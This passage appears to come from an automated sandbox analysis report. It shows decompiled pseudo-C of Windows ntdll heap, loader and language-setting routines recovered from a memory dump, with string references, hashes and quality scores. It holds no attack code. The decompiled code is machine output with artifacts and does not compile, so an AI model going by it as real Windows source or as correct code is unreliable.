                        				if(E02BA1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                        					_v56 = 1;
                        					if(_v8 != 0) {
                        						L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                        					}
                        					_v8 = _t280;
                        				}
                        				if(E02BA1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                        					_v60 =  *_v8;
                        					L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                        					_v8 = _t280;
                        				}
                        				if(E02BA1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                        					L16:
                        					if(E02BA1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                        						L28:
                        						if(E02BA1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                        							L46:
                        							_t275 = _v16;
                        							L47:
                        							_t161 = 0;
                        							L48:
                        							if(_v8 != 0) {
                        								L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                        							}
                        							_t140 = _v20;
                        							if(_t140 != 0) {
                        								if(_t275 != 0) {
                        									L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                        									_t275 = 0;
                        									_v28 = 0;
                        									_t140 = _v20;
                        								}
                        							}
                        							goto L50;
                        						}
                        						_t167 = _v12;
                        						_t255 = _v12 + 4;
                        						_v44 = _t255;
                        						if(_t255 == 0) {
                        							_t276 = _t280;
                        							_v32 = _t280;
                        						} else {
                        							_t276 = L02BB4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                        							_t167 = _v12;
                        							_v32 = _t276;
                        						}
                        						if(_t276 == 0) {
                        							_v44 = _t280;
                        							_t280 = 0xc0000017;
                        							goto L46;
                        						} else {
                        							E02BDF3E0(_t276, _v8, _t167);
                        							_v48 = _t276;
                        							_t277 = E02BE1370(_t276, 0x2b74e90);
                        							_pop(_t257);
                        							if(_t277 == 0) {
                        								L38:
                        								_t170 = _v48;
                        								if( *_v48 != 0) {
                        									E02BDBB40(0,  &_v68, _t170);
                        									if(L02BA43C0( &_v68,  &_v24) != 0) {
                        										_t280 =  &(_t280[0]);
                        									}
                        								}
                        								if(_t280 == 0) {
                        									_t280 = 0;
                        									L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                        									_v44 = 0;
                        									_v32 = 0;
                        								} else {
                        									_t280 = 0;
                        								}
                        								_t174 = _v8;
                        								if(_v8 != 0) {
                        									L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                        								}
                        								_v8 = _t280;
                        								goto L46;
                        							}
                        							_t243 = _v48;
                        							do {
                        								 *_t277 = 0;
                        								_t278 = _t277 + 2;
                        								E02BDBB40(_t257,  &_v68, _t243);
                        								if(L02BA43C0( &_v68,  &_v24) != 0) {
                        									_t280 =  &(_t280[0]);
                        								}
                        								_t243 = _t278;
                        								_t277 = E02BE1370(_t278, 0x2b74e90);
                        								_pop(_t257);
                        							} while (_t277 != 0);
                        							_v48 = _t243;
                        							_t242 = _v52;
                        							goto L38;
                        						}
                        					}
                        					_t191 = _v12;
                        					_t260 = _v12 + 4;
                        					_v28 = _t260;
                        					if(_t260 == 0) {
                        						_t275 = _t280;
                        						_v16 = _t280;
                        					} else {
                        						_t275 = L02BB4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                        						_t191 = _v12;
                        						_v16 = _t275;
                        					}
                        					if(_t275 == 0) {
                        						_v28 = _t280;
                        						_t280 = 0xc0000017;
                        						goto L47;
                        					} else {
                        						E02BDF3E0(_t275, _v8, _t191);
                        						_t285 = _t285 + 0xc;
                        						_v48 = _t275;
                        						_t279 = _t280;
                        						_t281 = E02BE1370(_v16, 0x2b74e90);
                        						_pop(_t262);
                        						if(_t281 != 0) {
                        							_t244 = _v48;
                        							do {
                        								 *_t281 = 0;
                        								_t282 = _t281 + 2;
                        								E02BDBB40(_t262,  &_v68, _t244);
                        								if(L02BA43C0( &_v68,  &_v24) != 0) {
                        									_t279 =  &(_t279[0]);
                        								}
                        								_t244 = _t282;
                        								_t281 = E02BE1370(_t282, 0x2b74e90);
                        								_pop(_t262);
                        							} while (_t281 != 0);
                        							_v48 = _t244;
                        							_t242 = _v52;
                        						}
                        						_t201 = _v48;
                        						_t280 = 0;
                        						if( *_v48 != 0) {
                        							E02BDBB40(_t262,  &_v68, _t201);
                        							if(L02BA43C0( &_v68,  &_v24) != 0) {
                        								_t279 =  &(_t279[0]);
                        							}
                        						}
                        						if(_t279 == 0) {
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                        							_v28 = _t280;
                        							_v16 = _t280;
                        						}
                        						_t202 = _v8;
                        						if(_v8 != 0) {
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                        						}
                        						_v8 = _t280;
                        						goto L28;
                        					}
                        				}
                        				_t214 = _v12;
                        				_t264 = _v12 + 4;
                        				_v40 = _t264;
                        				if(_t264 == 0) {
                        					_v20 = _t280;
                        				} else {
                        					_t236 = L02BB4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                        					_t280 = _t236;
                        					_v20 = _t236;
                        					_t214 = _v12;
                        				}
                        				if(_t280 == 0) {
                        					_t161 = 0;
                        					_t280 = 0xc0000017;
                        					_v40 = 0;
                        					goto L48;
                        				} else {
                        					E02BDF3E0(_t280, _v8, _t214);
                        					_t285 = _t285 + 0xc;
                        					_v48 = _t280;
                        					_t283 = E02BE1370(_t280, 0x2b74e90);
                        					_pop(_t267);
                        					if(_t283 != 0) {
                        						_t245 = _v48;
                        						do {
                        							 *_t283 = 0;
                        							_t284 = _t283 + 2;
                        							E02BDBB40(_t267,  &_v68, _t245);
                        							if(L02BA43C0( &_v68,  &_v24) != 0) {
                        								_t275 = _t275 + 1;
                        							}
                        							_t245 = _t284;
                        							_t283 = E02BE1370(_t284, 0x2b74e90);
                        							_pop(_t267);
                        						} while (_t283 != 0);
                        						_v48 = _t245;
                        						_t242 = _v52;
                        					}
                        					_t224 = _v48;
                        					_t280 = 0;
                        					if( *_v48 != 0) {
                        						E02BDBB40(_t267,  &_v68, _t224);
                        						if(L02BA43C0( &_v68,  &_v24) != 0) {
                        							_t275 = _t275 + 1;
                        						}
                        					}
                        					if(_t275 == 0) {
                        						L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                        						_v40 = _t280;
                        						_v20 = _t280;
                        					}
                        					_t225 = _v8;
                        					if(_v8 != 0) {
                        						L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                        					}
                        					_v8 = _t280;
                        					goto L16;
                        				}
                        			}











































                        Strings
                        • Kernel-MUI-Language-Disallowed, xrefs: 02BA3E97
                        • Kernel-MUI-Number-Allowed, xrefs: 02BA3D8C
                        • Kernel-MUI-Language-SKU, xrefs: 02BA3F70
                        • WindowsExcludedProcs, xrefs: 02BA3D6F
                        • Kernel-MUI-Language-Allowed, xrefs: 02BA3DC0
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                        • API String ID: 0-258546922
                        • Opcode ID: a445f576ebce33b4e25747b25d687314752749ff207e255d0c6c88358e7d8e62
                        • Instruction ID: 409408a7a1801c7c5baa64976b7c27fa162a2742023b72dcc2c6ded0c6c69690
                        • Opcode Fuzzy Hash: a445f576ebce33b4e25747b25d687314752749ff207e255d0c6c88358e7d8e62
                        • Instruction Fuzzy Hash: 4CF15872D14618EBCB11DF98C990AEEBBF9FF48750F1540AAE905A7210E7709E04CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 29%
                        			E02B940E1(void* __edx) {
                        				void* _t19;
                        				void* _t29;
                        
                        				_t28 = _t19;
                        				_t29 = __edx;
                        				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        						_push("HEAP: ");
                        						E02B9B150();
                        					} else {
                        						E02B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					E02B9B150("Invalid heap signature for heap at %p", _t28);
                        					if(_t29 != 0) {
                        						E02B9B150(", passed to %s", _t29);
                        					}
                        					_push("\n");
                        					E02B9B150();
                        					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                        						 *0x2c86378 = 1;
                        						asm("int3");
                        						 *0x2c86378 = 0;
                        					}
                        					return 0;
                        				}
                        				return 1;
                        			}






                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                        • API String ID: 0-188067316
                        • Opcode ID: 6bdf6a096fc87b79695d404b6f38f2dc3a577c1817dacdd74a50fca01ab87dd1
                        • Instruction ID: 16551ea1caf1a441f528371c2ed1d2408fb25ddaeab743a5baab10d7791d297e
                        • Opcode Fuzzy Hash: 6bdf6a096fc87b79695d404b6f38f2dc3a577c1817dacdd74a50fca01ab87dd1
                        • Instruction Fuzzy Hash: 5A0128321106509EF615E764A40EF9277B8DB02F34F2884F9F1194B772CBE494C4C920
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 69%
                        			E02BBA229(void* __ecx, void* __edx) {
                        				signed int _v20;
                        				char _v24;
                        				char _v28;
                        				void* _v44;
                        				void* _v48;
                        				void* _v56;
                        				void* _v60;
                        				void* __ebx;
                        				signed int _t55;
                        				signed int _t57;
                        				void* _t61;
                        				intOrPtr _t62;
                        				void* _t65;
                        				void* _t71;
                        				signed char* _t74;
                        				intOrPtr _t75;
                        				signed char* _t80;
                        				intOrPtr _t81;
                        				void* _t82;
                        				signed char* _t85;
                        				signed char _t91;
                        				void* _t103;
                        				void* _t105;
                        				void* _t121;
                        				void* _t129;
                        				signed int _t131;
                        				void* _t133;
                        
                        				_t105 = __ecx;
                        				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                        				_t103 = __edx;
                        				_t129 = __ecx;
                        				E02BBDF24(__edx,  &_v28, _t133);
                        				_t55 =  *(_t129 + 0x40) & 0x00040000;
                        				asm("sbb edi, edi");
                        				_t121 = ( ~_t55 & 0x0000003c) + 4;
                        				if(_t55 != 0) {
                        					_push(0);
                        					_push(0x14);
                        					_push( &_v24);
                        					_push(3);
                        					_push(_t129);
                        					_push(0xffffffff);
                        					_t57 = E02BD9730();
                        					__eflags = _t57;
                        					if(_t57 < 0) {
                        						L17:
                        						_push(_t105);
                        						E02C5A80D(_t129, 1, _v20, 0);
                        						_t121 = 4;
                        						goto L1;
                        					}
                        					__eflags = _v20 & 0x00000060;
                        					if((_v20 & 0x00000060) == 0) {
                        						goto L17;
                        					}
                        					__eflags = _v24 - _t129;
                        					if(_v24 == _t129) {
                        						goto L1;
                        					}
                        					goto L17;
                        				}
                        				L1:
                        				_push(_t121);
                        				_push(0x1000);
                        				_push(_t133 + 0x14);
                        				_push(0);
                        				_push(_t133 + 0x20);
                        				_push(0xffffffff);
                        				_t61 = E02BD9660();
                        				_t122 = _t61;
                        				if(_t61 < 0) {
                        					_t62 =  *[fs:0x30];
                        					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                        					__eflags =  *(_t62 + 0xc);
                        					if( *(_t62 + 0xc) == 0) {
                        						_push("HEAP: ");
                        						E02B9B150();
                        					} else {
                        						E02B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					_push( *((intOrPtr*)(_t133 + 0xc)));
                        					_push( *((intOrPtr*)(_t133 + 0x14)));
                        					_push(_t129);
                        					E02B9B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                        					_t65 = 0;
                        					L13:
                        					return _t65;
                        				}
                        				_t71 = E02BB7D50();
                        				_t124 = 0x7ffe0380;
                        				if(_t71 != 0) {
                        					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        				} else {
                        					_t74 = 0x7ffe0380;
                        				}
                        				if( *_t74 != 0) {
                        					_t75 =  *[fs:0x30];
                        					__eflags =  *(_t75 + 0x240) & 0x00000001;
                        					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                        						E02C5138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                        					}
                        				}
                        				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                        				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                        				if(E02BB7D50() != 0) {
                        					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        				} else {
                        					_t80 = _t124;
                        				}
                        				if( *_t80 != 0) {
                        					_t81 =  *[fs:0x30];
                        					__eflags =  *(_t81 + 0x240) & 0x00000001;
                        					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                        						__eflags = E02BB7D50();
                        						if(__eflags != 0) {
                        							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        						}
                        						E02C51582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                        					}
                        				}
                        				_t82 = E02BB7D50();
                        				_t125 = 0x7ffe038a;
                        				if(_t82 != 0) {
                        					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                        				} else {
                        					_t85 = 0x7ffe038a;
                        				}
                        				if( *_t85 != 0) {
                        					__eflags = E02BB7D50();
                        					if(__eflags != 0) {
                        						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                        						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                        					}
                        					E02C51582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                        				}
                        				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                        				_t91 =  *(_t103 + 2);
                        				if((_t91 & 0x00000004) != 0) {
                        					E02BED5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                        					_t91 =  *(_t103 + 2);
                        				}
                        				 *(_t103 + 2) = _t91 & 0x00000017;
                        				_t65 = 1;
                        				goto L13;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                        • API String ID: 0-2586055223
                        • Opcode ID: 595860de21c4e5339cc02bf15ccebfcf90f80db86d3882a09142d650c09208c5
                        • Instruction ID: 555468e35a089908d6cd62bfca2e9117faaa3aa31a9f090301d3609d9b1fad2b
                        • Opcode Fuzzy Hash: 595860de21c4e5339cc02bf15ccebfcf90f80db86d3882a09142d650c09208c5
                        • Instruction Fuzzy Hash: F951E4726057809FD712DB68C888FB7B7E9FF80B54F1804A4F9998B2D1DBA4D940CB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 44%
                        			E02BC8E00(void* __ecx) {
                        				signed int _v8;
                        				char _v12;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr* _t32;
                        				intOrPtr _t35;
                        				intOrPtr _t43;
                        				void* _t46;
                        				intOrPtr _t47;
                        				void* _t48;
                        				signed int _t49;
                        				void* _t50;
                        				intOrPtr* _t51;
                        				signed int _t52;
                        				void* _t53;
                        				intOrPtr _t55;
                        
                        				_v8 =  *0x2c8d360 ^ _t52;
                        				_t49 = 0;
                        				_t48 = __ecx;
                        				_t55 =  *0x2c88464; // 0x75150110
                        				if(_t55 == 0) {
                        					L9:
                        					if( !_t49 >= 0) {
                        						if(( *0x2c85780 & 0x00000003) != 0) {
                        							E02C15510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                        						}
                        						if(( *0x2c85780 & 0x00000010) != 0) {
                        							asm("int3");
                        						}
                        					}
                        					return E02BDB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                        				}
                        				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                        				_t43 =  *0x2c87984; // 0x2732af0
                        				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                        					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                        					if(_t48 == _t43) {
                        						_t50 = 0x5c;
                        						if( *_t32 == _t50) {
                        							_t46 = 0x3f;
                        							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                        								_t32 = _t32 + 8;
                        							}
                        						}
                        					}
                        					_t51 =  *0x2c88464; // 0x75150110
                        					 *0x2c8b1e0(_t47, _t32,  &_v12);
                        					_t49 =  *_t51();
                        					if(_t49 >= 0) {
                        						L8:
                        						_t35 = _v12;
                        						if(_t35 != 0) {
                        							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                        								E02BC9B10( *((intOrPtr*)(_t48 + 0x48)));
                        								_t35 = _v12;
                        							}
                        							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                        						}
                        						goto L9;
                        					}
                        					if(_t49 != 0xc000008a) {
                        						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                        							if(_t49 != 0xc00000bb) {
                        								goto L8;
                        							}
                        						}
                        					}
                        					if(( *0x2c85780 & 0x00000005) != 0) {
                        						_push(_t49);
                        						E02C15510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                        						_t53 = _t53 + 0x1c;
                        					}
                        					_t49 = 0;
                        					goto L8;
                        				} else {
                        					goto L9;
                        				}
                        			}

                        Strings
                        • Querying the active activation context failed with status 0x%08lx, xrefs: 02C09357
                        • minkernel\ntdll\ldrsnap.c, xrefs: 02C0933B, 02C09367
                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 02C0932A
                        • LdrpFindDllActivationContext, xrefs: 02C09331, 02C0935D
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                        • API String ID: 0-3779518884
                        • Opcode ID: 082e2f3cf10e0e25c297855829761930eae3ab8310cd35ebe2fb368527f2b93d
                        • Instruction ID: 4dc871cf4e03cab692cbc4cea8743b367a67d63827bcbf467c47801cdf5f0e7c
                        • Opcode Fuzzy Hash: 082e2f3cf10e0e25c297855829761930eae3ab8310cd35ebe2fb368527f2b93d
                        • Instruction Fuzzy Hash: 20414CB2E403179FEB36AB58CC88B35B375EB44748F2685EDE41957191E770AD80C781
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                        • API String ID: 0-336120773
                        • Opcode ID: d0540fa3b294502f5198189835336ad49b468a51b184acc8fb457f905c2a16fd
                        • Instruction ID: 8bd9a89f3ccfe173bf12860990a4671166faf4d0d6c2fb5c5b9e184032a97801
                        • Opcode Fuzzy Hash: d0540fa3b294502f5198189835336ad49b468a51b184acc8fb457f905c2a16fd
                        • Instruction Fuzzy Hash: 42312631150124EFE764DFA8C885FA773A9EF41B24F1545A5F81A8B260E770E9C0EE6C
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 83%
                        			E02BA8794(void* __ecx) {
                        				signed int _v0;
                        				char _v8;
                        				signed int _v12;
                        				void* _v16;
                        				signed int _v20;
                        				intOrPtr _v24;
                        				signed int _v28;
                        				signed int _v32;
                        				signed int _v40;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr* _t77;
                        				signed int _t80;
                        				signed char _t81;
                        				signed int _t87;
                        				signed int _t91;
                        				void* _t92;
                        				void* _t94;
                        				signed int _t95;
                        				signed int _t103;
                        				signed int _t105;
                        				signed int _t110;
                        				signed int _t118;
                        				intOrPtr* _t121;
                        				intOrPtr _t122;
                        				signed int _t125;
                        				signed int _t129;
                        				signed int _t131;
                        				signed int _t134;
                        				signed int _t136;
                        				signed int _t143;
                        				signed int* _t147;
                        				signed int _t151;
                        				void* _t153;
                        				signed int* _t157;
                        				signed int _t159;
                        				signed int _t161;
                        				signed int _t166;
                        				signed int _t168;
                        
                        				_push(__ecx);
                        				_t153 = __ecx;
                        				_t159 = 0;
                        				_t121 = __ecx + 0x3c;
                        				if( *_t121 == 0) {
                        					L2:
                        					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                        					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                        						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                        						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                        						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                        							L6:
                        							if(E02BA934A() != 0) {
                        								_t159 = E02C1A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                        								__eflags = _t159;
                        								if(_t159 < 0) {
                        									_t81 =  *0x2c85780; // 0x0
                        									__eflags = _t81 & 0x00000003;
                        									if((_t81 & 0x00000003) != 0) {
                        										_push(_t159);
                        										E02C15510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                        										_t81 =  *0x2c85780; // 0x0
                        									}
                        									__eflags = _t81 & 0x00000010;
                        									if((_t81 & 0x00000010) != 0) {
                        										asm("int3");
                        									}
                        								}
                        							}
                        						} else {
                        							_t159 = E02BA849B(0, _t122, _t153, _t159, _t180);
                        							if(_t159 >= 0) {
                        								goto L6;
                        							}
                        						}
                        						_t80 = _t159;
                        						goto L8;
                        					} else {
                        						_t125 = 0x13;
                        						asm("int 0x29");
                        						_push(0);
                        						_push(_t159);
                        						_t161 = _t125;
                        						_t87 =  *( *[fs:0x30] + 0x1e8);
                        						_t143 = 0;
                        						_v40 = _t161;
                        						_t118 = 0;
                        						_push(_t153);
                        						__eflags = _t87;
                        						if(_t87 != 0) {
                        							_t118 = _t87 + 0x5d8;
                        							__eflags = _t118;
                        							if(_t118 == 0) {
                        								L46:
                        								_t118 = 0;
                        							} else {
                        								__eflags =  *(_t118 + 0x30);
                        								if( *(_t118 + 0x30) == 0) {
                        									goto L46;
                        								}
                        							}
                        						}
                        						_v32 = 0;
                        						_v28 = 0;
                        						_v16 = 0;
                        						_v20 = 0;
                        						_v12 = 0;
                        						__eflags = _t118;
                        						if(_t118 != 0) {
                        							__eflags = _t161;
                        							if(_t161 != 0) {
                        								__eflags =  *(_t118 + 8);
                        								if( *(_t118 + 8) == 0) {
                        									L22:
                        									_t143 = 1;
                        									__eflags = 1;
                        								} else {
                        									_t19 = _t118 + 0x40; // 0x40
                        									_t156 = _t19;
                        									E02BA8999(_t19,  &_v16);
                        									__eflags = _v0;
                        									if(_v0 != 0) {
                        										__eflags = _v0 - 1;
                        										if(_v0 != 1) {
                        											goto L22;
                        										} else {
                        											_t128 =  *(_t161 + 0x64);
                        											__eflags =  *(_t161 + 0x64);
                        											if( *(_t161 + 0x64) == 0) {
                        												goto L22;
                        											} else {
                        												E02BA8999(_t128,  &_v12);
                        												_t147 = _v12;
                        												_t91 = 0;
                        												__eflags = 0;
                        												_t129 =  *_t147;
                        												while(1) {
                        													__eflags =  *((intOrPtr*)(0x2c85c60 + _t91 * 8)) - _t129;
                        													if( *((intOrPtr*)(0x2c85c60 + _t91 * 8)) == _t129) {
                        														break;
                        													}
                        													_t91 = _t91 + 1;
                        													__eflags = _t91 - 5;
                        													if(_t91 < 5) {
                        														continue;
                        													} else {
                        														_t131 = 0;
                        														__eflags = 0;
                        													}
                        													L37:
                        													__eflags = _t131;
                        													if(_t131 != 0) {
                        														goto L22;
                        													} else {
                        														__eflags = _v16 - _t147;
                        														if(_v16 != _t147) {
                        															goto L22;
                        														} else {
                        															E02BB2280(_t92, 0x2c886cc);
                        															_t94 = E02C69DFB( &_v20);
                        															__eflags = _t94 - 1;
                        															if(_t94 != 1) {
                        															}
                        															asm("movsd");
                        															asm("movsd");
                        															asm("movsd");
                        															asm("movsd");
                        															 *_t118 =  *_t118 + 1;
                        															asm("adc dword [ebx+0x4], 0x0");
                        															_t95 = E02BC61A0( &_v32);
                        															__eflags = _t95;
                        															if(_t95 != 0) {
                        																__eflags = _v32 | _v28;
                        																if((_v32 | _v28) != 0) {
                        																	_t71 = _t118 + 0x40; // 0x3f
                        																	_t134 = _t71;
                        																	goto L55;
                        																}
                        															}
                        															goto L30;
                        														}
                        													}
                        													goto L56;
                        												}
                        												_t92 = 0x2c85c64 + _t91 * 8;
                        												asm("lock xadd [eax], ecx");
                        												_t131 = (_t129 | 0xffffffff) - 1;
                        												goto L37;
                        											}
                        										}
                        										goto L56;
                        									} else {
                        										_t143 = E02BA8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                        										__eflags = _t143;
                        										if(_t143 != 0) {
                        											_t157 = _v12;
                        											_t103 = 0;
                        											__eflags = 0;
                        											_t136 =  &(_t157[1]);
                        											 *(_t161 + 0x64) = _t136;
                        											_t151 =  *_t157;
                        											_v20 = _t136;
                        											while(1) {
                        												__eflags =  *((intOrPtr*)(0x2c85c60 + _t103 * 8)) - _t151;
                        												if( *((intOrPtr*)(0x2c85c60 + _t103 * 8)) == _t151) {
                        													break;
                        												}
                        												_t103 = _t103 + 1;
                        												__eflags = _t103 - 5;
                        												if(_t103 < 5) {
                        													continue;
                        												}
                        												L21:
                        												_t105 = E02BDF380(_t136, 0x2b71184, 0x10);
                        												__eflags = _t105;
                        												if(_t105 != 0) {
                        													__eflags =  *_t157 -  *_v16;
                        													if( *_t157 >=  *_v16) {
                        														goto L22;
                        													} else {
                        														asm("cdq");
                        														_t166 = _t157[5] & 0x0000ffff;
                        														_t108 = _t157[5] & 0x0000ffff;
                        														asm("cdq");
                        														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                        														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                        														if(__eflags > 0) {
                        															L29:
                        															E02BB2280(_t108, 0x2c886cc);
                        															 *_t118 =  *_t118 + 1;
                        															_t42 = _t118 + 0x40; // 0x3f
                        															_t156 = _t42;
                        															asm("adc dword [ebx+0x4], 0x0");
                        															asm("movsd");
                        															asm("movsd");
                        															asm("movsd");
                        															asm("movsd");
                        															_t110 = E02BC61A0( &_v32);
                        															__eflags = _t110;
                        															if(_t110 != 0) {
